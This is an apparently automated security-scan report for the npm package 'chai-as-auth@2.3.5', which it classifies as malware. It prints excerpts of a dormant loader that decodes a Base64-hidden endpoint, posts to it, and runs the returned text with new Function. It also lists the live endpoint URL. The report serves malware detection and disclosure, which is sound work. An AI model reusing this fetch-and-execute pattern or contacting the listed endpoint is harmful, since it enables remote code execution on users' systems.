registry  /  chai-as-auth  /  2.3.5

chai-as-auth@2.3.5

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 35s ago · by lpm-firewall-ai

A dormant source file contacts a hardcoded endpoint and executes its response as CommonJS-capable JavaScript if that file is directly loaded. It is not wired into the manifest entrypoint or an install hook.

Static reason
One or more suspicious static signals were detected.
Trigger
Directly requiring or otherwise loading `lib/initializeCaller.js`
Impact
Arbitrary code execution in the consuming Node process if the dormant file is loaded.
Mechanism
Remote payload retrieval followed by dynamic code execution
Rationale
The package contains a concrete remote-code-execution payload but does not expose it through lifecycle hooks or reachable entrypoints. Treat it as a suspicious staged payload carrier and warn rather than block.
Evidence
package.jsonlib/initializeCaller.jslib/const.jsfile.jslib/transport-stream.jslib/worker.js
Network endpoints1
ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10518
Source
OpenSSF Malicious Packages via OSV
Summary
The package contains a concrete remote-code-execution payload but does not expose it through lifecycle hooks or reachable entrypoints. Treat it as a suspicious staged payload carrier and warn rather than block.
References

Decision evidence

public snapshot
AI called this Suspicious at 97.0% confidence as Malware with low false-positive risk.
Evidence for warning
  • `lib/initializeCaller.js` decodes a hardcoded Vercel endpoint and POSTs data to it.
  • That file executes response text with `new Function("require", response.data)` when loaded.
  • `lib/initializeCaller.js` is an immediately invoked async function, so direct import triggers its network/RCE chain.
  • The payload file is not referenced by other package source files.
  • `package.json` has no lifecycle hooks and its `main` (`index.js`) is absent.
Evidence against
  • The local `process` object shadows Node's real `process`, so the POST contains only hardcoded values, not host environment variables.
  • No source imports `lib/initializeCaller.js`; normal package entry loading cannot reach it because `index.js` is missing.
  • No install-time script, persistence, filesystem mutation, or AI-agent control-surface mutation was found.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 16 file(s), 51.9 KB of source, external domains: github.com

Source & flagged code

4 flagged · loading source
lib/initializeCaller.jsView file
28.then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Eval

Package source references dynamic code evaluation.

lib/initializeCaller.jsView on unpkg · L28
13const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); L15: const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L13
2L3: const axios = require("axios"); L4: const process = { ... L12: (async function initializeCaller(..._args) { L13: const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

4 High3 Medium3 Low
HighChild Process
HighEvallib/initializeCaller.js
HighSame File Env Network Executionlib/initializeCaller.js
HighBase64 Obscured Urllib/initializeCaller.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings